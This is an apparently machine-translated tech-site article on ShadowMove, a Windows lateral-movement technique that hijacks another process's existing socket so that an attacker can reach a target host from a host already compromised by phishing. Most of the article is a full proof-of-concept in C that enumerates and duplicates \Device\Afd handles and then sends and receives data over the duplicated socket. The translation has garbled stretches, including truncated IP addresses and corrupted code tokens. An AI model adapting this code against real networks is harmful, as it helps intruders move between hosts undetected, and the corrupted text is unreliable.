Shulou(Shulou.com)06/03 Report--

This article focuses on "how to understand the new means of horizontal penetration of ShadowMove: to achieve horizontal penetration by copying existing Socket", interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to understand the new means of horizontal penetration of ShadowMove: to achieve horizontal penetration by copying existing Socket.

Technical Overview

The figure below shows a simple flow chart of how this technology works and how we can test it in our own experimental environment. In the following figure, we use ShadowMove technology to communicate between the source host and the target host:

Let me explain to you the details of the picture above:

On the left side of the image above, we have a compromised host (for example, we hacked it through a phishing attack) with an IP address of 168.1.117. This host is the source host that we need to start horizontal penetration, and we need to use it to attack the host with IP address 192.168.56.102.

On the right is our target host, the IP address is 168.56.102, this host has a listening Socket on TCP port 80 and runs the command "nc-lvp 80".

The source host, 168.1.117, has established a connection with our target host, 192.168.56.102, via nc.exe.

On the source host, there is a running process named exe. This process will be responsible for performing the ShadowMove horizontal penetration operation. It is important to note that it does not establish any connection with the remote host throughout the life cycle, which is the unique charm of this technology.

On the source host, exe enumerates all handlers related to nc.exe and\ Device\ Afd and uses them for network Socket communication. Once found, the process uses these handlers and calls the API of WSADuplicateSocketW and WSASocket to copy the Socket. Once the shared Socket is created, the process will use getpeername to determine whether the destination address of the Socket is the IP address of the target host, that is, 192.168.56.102.

When a shared Socket pointing to the target host based on\ Device\ Afd is created, exe will be able to write data to Socket using send API, or use recv API to read data from it.

Again, ShadowMove.exe does not create any TCP links to the target host. Instead, it directly reuses the existing Socket between the source host and the target host (192.168.56.102 Socket 80), which is the key to this horizontal penetration technology.

PoC code

The following is the PoC code provided by security expert Juan Manuel Fern á ndez. In order to complete the code compilation in the development environment of Visual Studio 2019, I have made some modifications:

/ / PoC of ShadowMove Gateway by Juan Manuel Fern á ndez (@ TheXC3LL) # define _ WINSOCK_DEPRECATED_NO_WARNINGS#include # pragma comment (lib, "WS2_32") / / Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004#define SystemHandleInformation 16#define ObjectNameInformation 1 typedef NTSTATUS (NTAPI* _ NtQuerySystemInformation) (ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength) Typedef NTSTATUS (NTAPI* _ NtDuplicateObject) (HANDLE SourceProcessHandle,HANDLE SourceHandle,HANDLE TargetProcessHandle,PHANDLE TargetHandle,ACCESS_MASK DesiredAccess,ULONG Attributes,ULONG Options); typedef NTSTATUS (NTAPI* _ NtQueryObject) (HANDLE ObjectHandle,ULONG ObjectInformationClass,PVOID ObjectInformation,ULONG ObjectInformationLength,PULONG ReturnLength); typedef struct _ SYSTEM_HANDLE {ULONG ProcessId;BYTE ObjectTypeNumber;BYTE Flags;USHORT Handle;PVOID Object;ACCESS_MASK GrantedAccess;} SYSTEM_HANDLE, * PSYSTEM_HANDLE; typedef struct _ SYSTEM_HANDLE_INFORMATION {ULONG HandleCount;SYSTEM_HANDLE Handles [1] } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; typedef struct _ UNICODE_STRING {USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING; typedef enum _ POOL_TYPE {NonPagedPool,PagedPool,NonPagedPoolMustSucceed,DontUseThisType,NonPagedPoolCacheAligned,PagedPoolCacheAligned,NonPagedPoolCacheAlignedMustS} POOL_TYPE, * PPOOL_TYPE; typedef struct _ OBJECT_NAME_INFORMATION {UNICODE_STRING Name;} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION; PVOID GetLibraryProcAddress (const char * LibraryName, const char * ProcName) {return GetProcAddress (GetModuleHandleA (LibraryName), ProcName) } SOCKET findTargetSocket (DWORD dwProcessId, LPSTR dstIP) {HANDLE hProc;PSYSTEM_HANDLE_INFORMATION handleInfo;DWORD handleInfoSize = 0x10000 PROCESS_DUP_HANDLE status;DWORD returnLength;WSAPROTOCOL_INFOW wsaProtocolInfo = {0}; SOCKET targetSocket; / / Open target process with PROCESS_DUP_HANDLE rightshProc = OpenProcess (PROCESS_DUP_HANDLE, FALSE, dwProcessId); if (! hProc) {printf ("[!] Error: could not open the process!\ n "); exit (- 1);} printf (" [+] Handle to process obtained!\ n "); / / Find the functions_NtQuerySystemInformation NtQuerySystemInformation = (_ NtQuerySystemInformation) GetLibraryProcAddress (" ntdll.dll "," NtQuerySystemInformation "); _ NtDuplicateObject NtDuplicateObject = (_ NtDuplicateObject) GetLibraryProcAddress (" ntdll.dll "," NtDuplicateObject "); _ NtQueryObject NtQueryObject = (_ NtQueryObject) GetLibraryProcAddress (" ntdll.dll "," NtQueryObject "); / / Retrieve handles from the target processhandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc (handleInfoSize) While ((status = NtQuerySystemInformation (SystemHandleInformation, handleInfo, handleInfoSize, NULL)) = = STATUS_INFO_LENGTH_MISMATCH) handleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc (handleInfo, handleInfoSize * = 2); printf ("[+] Found [% d] handles in PID% d\ n =\ n", handleInfo- > HandleCount, dwProcessId); / / Iteratefor (DWORD I = 0; I

HandleCount; iTunes +) {/ / Check if it is the desired type of handleif (handleInfo- > handles.ObjectTypeNumber = = 0x24) {SYSTEM_HANDLE handle = handleInfo- > Handles [I]; HANDLE dupHandle = NULL;POBJECT_NAME_INFORMATION objectNameInfo; / / Duplicate handleNtDuplicateObject (hProc, (HANDLE) handle.Handle, GetCurrentProcess (), & dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS); objectNameInfo = (POBJECT_NAME_INFORMATION) malloc (0x1000); / / Get handle infoNtQueryObject (dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, & returnLength) / / Narow the search checking if the name length is correct (len (\ Device\ Afd) = = 11 * 2) if (objectNameInfo- > Name.Length = = 22) {printf ("[-] Testing% d of% d\ n", I, handleInfo- > HandleCount); / / Check if it ends in "Afd" LPWSTR needle = (LPWSTR) malloc (8); memcpy (needle, objectNameInfo- > Name.Buffer + 8,6) If (needle [0] = ='A'& & needle [1] ='f'& & needle [2] = ='d') {/ / We got a candidateprintf ("\ t [*]\\ Device\\ Afd found at% d!\ n", I); / / Try to duplicate the socketstatus = WSADuplicateSocketW ((SOCKET) dupHandle, GetCurrentProcessId (), & wsaProtocolInfo); if (status! = 0) {printf ("\ t\ t [X] Error duplicating socket!\ n"); free (needle); free (objectNameInfo) CloseHandle (dupHandle); continue;} / / We got it?targetSocket = WSASocket (wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, & wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED); if (targetSocket! = INVALID_SOCKET) {struct sockaddr_in sockaddr;DWORD len;len = sizeof (SOCKADDR_IN) / It this the socket?if (getpeername (targetSocket, (SOCKADDR*) & sockaddr, (int*) & len) = 0) {if (strcmp (inet_ntoa (sockaddr.sin_addr), dstIP) = = 0) {printf ("\ t [*] Duplicated socket (% s)\ n", inet_ntoa (sockaddr.sin_addr)); free (needle); free (objectNameInfo); return targetSocket;} free (needle);} free (objectNameInfo);}} return 0 } int main (int argc, char** argv) {WORD wVersionRequested;WSADATA wsaData;DWORD dwProcessId;LPSTR dstIP = NULL;SOCKET targetSocket;char buff [255i] = {0}; printf ("\ t\ t\ tMel = [ShadowMove Gateway PoC] = -\ n\ n"); / / smgateway.exe [PID] [IP dst] / * It's just a PoC, we do not validate the args. But at least check if number of args is right X) * / if (argc! = 3) {printf ("[!] Error: syntax is% s [PID] [IP dst]\ n ", argv [0]); exit (- 1);} dwProcessId = strtoul (argv [1], NULL, 10); dstIP = (LPSTR) malloc (strlen (argv [2]) * (char) + 1); memcpy (dstIP, argv [2], strlen (dstIP)); / / ClassicwVersionRequested = MAKEWORD (2,2); WSAStartup (wVersionRequested, & wsaData); targetSocket = findTargetSocket (dwProcessId, dstIP) Send (targetSocket, "hello from shadowmove and reused socket!\ n", strlen ("hello from shadowmove and reused socket!\ n"), 0); recv (targetSocket, buff, 255,0); printf ("\ n [*] Message from target to shadowmove:\ n\ n% s\ n", buff); return 0;} demo samples

After compiling the above code, we can test it. In the following demonstration example, we demonstrate the practice scenario of the ShadowMove horizontal penetration technology:

At this point, I believe you have a deeper understanding of "how to understand the new means of horizontal penetration of ShadowMove: to achieve horizontal penetration by copying existing Socket". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.